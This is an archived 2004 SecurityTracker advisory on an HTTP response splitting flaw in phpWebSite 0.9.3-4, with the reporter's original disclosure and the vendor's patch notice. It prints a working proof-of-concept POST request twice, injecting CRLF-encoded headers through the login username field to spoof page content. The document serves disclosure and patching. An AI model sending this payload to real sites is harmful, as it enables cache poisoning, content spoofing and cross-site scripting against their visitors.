phpWebSite Input Validation Flaws Let Remote Users Conduct HTTP Response Splitting Attacks
|
|
SecurityTracker Alert ID: 1012200
|
|
SecurityTracker URL: http://securitytracker.com/id?1012200
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Nov 12 2004
|
Impact: Modification of system information, Modification of user information
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 0.9.3-4
|
Description: A vulnerability was reported in phpWebSite. A remote user can conduct HTTP response splitting attacks.
Maestro reported that the 'index.php' script does not properly validate user-supplied input in several parameters. A remote user
can submit a specially crafted HTTP POST request to cause the target server to return a split response. A remote user can exploit
this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.
A demonstration exploit POST request is provided:
POST /index.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length:
218
Connection: Keep-Alive
module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20Ok%0d%0aContent-Length:%2031%0d%0aConte
nt-Type:%
site in 0wned</html>&password=foobar
|
Impact: A remote user can create a request that, when loaded by the target user, will cause arbitrary content to be displayed.
A remote user may be able to poison any intermediate web caches with arbitrary content.
|
Solution: The vendor has issued the following patch for 0.9.3-2 or greater:
http://phpwebsite.appstate.edu/downloads/security/phpwebsite-core-security-patch2.tar.gz
md5sum: fcefda44a8d691c844593d815479a1ce
|
Vendor URL: phpwebsite.appstate.edu/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "Maestro De-Seguridad" <maestrodeseguridad@lycos.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 11 Nov 2004 14:55:35 -0500
From: "Maestro De-Seguridad" <maestrodeseguridad@lycos.com>
Subject: security hole (http response splitting) in phpwebsite
|
ADVISORY
Author: Maestro (me!)
Date: 11-NOV-04
Vendor: Appalachian State University (http://phpwebsite.appstate.edu/)
Product: phpWebSite 0.9.3-4
Product description (from vendor website):
phpWebSite provides a complete web site content management system. Web-based administration allows fo
r easy maintenance of interactive,
community-driven web sites.
phpWebSite's growing number of modules allow for easy site customization without the need for unwante
d or unused features. Client
output from phpWebSite is valid XHTML 1.0 and meets the W3C's Web Accessibility Initiative requireme
nts.
phpWebSite is written in the PHP Programming Language, making it ideal for developers to write custom
ized modules.
Problem: Http response splitting (web cache poisoning, xss,
yadayadayada) - http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Exploit:
POST /index.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 218
Connection: Keep-Alive
module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%2
0200%20Ok%0d%0aContent-Length:%2031%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}This
site in 0wned{/html}&password=foobar
(replace curly braces with lessthan and greaterthan)
Vendor status: The vendor fixed this problem (11-NOV-04).
>From vendor security mail list:
A security vulnerability was brought to our attention recently and we
have posted a patch to resolve this issue. The patch can be
downloaded
from here:
http://phpwebsite.appstate.edu/downloads/security/phpwebsite-core-security-patch2.tar.gz
md5sum: fcefda44a8d691c844593d815479a1ce
This patch should only be applied to versions 0.9.3-2 or greater. All
you need to do is untar the file in the base directory of your
phpwebsite install.
--
_______________________________________________
Find what you are looking for with the Lycos Yellow Pages
http://r.lycos.com/r/yp_emailfooter/http://yellowpages.lycos.com/default.asp?SRC=lycos10
|
|
